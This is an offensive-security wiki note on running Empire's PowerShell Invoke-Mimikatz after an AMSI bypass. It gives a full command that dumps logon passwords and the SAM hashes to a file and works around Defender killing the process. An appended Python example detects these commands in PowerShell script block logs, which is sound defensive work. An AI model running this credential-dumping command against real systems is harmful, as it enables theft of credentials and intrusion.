# Invoke-Mimikatz

[[Mimikatz]] binaries are generally detected by AV on download these days, but fortunately there's a PowerShell [re-implementation available from the Empire Project](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1) that can be run after bypassing AMSI.

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt
```

Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file.

%%
## Dumping tickets
![[Use Invoke-Mimikatz to dump Kerberos tickets]]

## Pass the hash
![[Pass the hash with Invoke-Mimikatz]]
%%
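
On the detection side, the command shown above leaves its module names in PowerShell script block logs (Event ID 4104). The sketch below is an added example, not part of the original note or of Empire: it reassembles fragmented script blocks before matching, because an indicator can straddle two fragments. It assumes script block logging is enabled and the events were exported as records. The sample records and the names `INDICATORS`, `reassemble` and `detect` are constructed for illustration.

```python
import re
from collections import defaultdict

# Indicators taken from the command shown on this page.
INDICATORS = re.compile(
    r"invoke-mimikatz|privilege::debug|token::elevate|"
    r"sekurlsa::logonpasswords|lsadump::sam",
    re.IGNORECASE,
)

# Constructed sample records using Event ID 4104 field names. They arrive
# out of order, and one indicator is split across two fragments.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "aaaa-1111", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "lsa::logonpasswords\" \"lsadump::sam\" \"exit\"' > C:\\mkat.txt"},
    {"ScriptBlockId": "bbbb-2222", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"ScriptBlockId": "aaaa-1111", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"privilege::debug\" \"token::elevate\" \"sekur"},
]


def reassemble(events):
    """Join the fragments of each script block in MessageNumber order."""
    parts = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {
        block_id: "".join(frags[n] for n in sorted(frags))
        for block_id, frags in parts.items()
    }


def detect(events):
    """Return {ScriptBlockId: sorted indicator hits} for matching blocks."""
    findings = {}
    for block_id, text in reassemble(events).items():
        hits = sorted({m.group(0).lower() for m in INDICATORS.finditer(text)})
        if hits:
            findings[block_id] = hits
    return findings


if __name__ == "__main__":
    for block_id, hits in detect(SAMPLE_EVENTS).items():
        print(block_id, hits)
```

Matching each fragment on its own would miss `sekurlsa::logonpasswords` in this sample, since it is split between the two records.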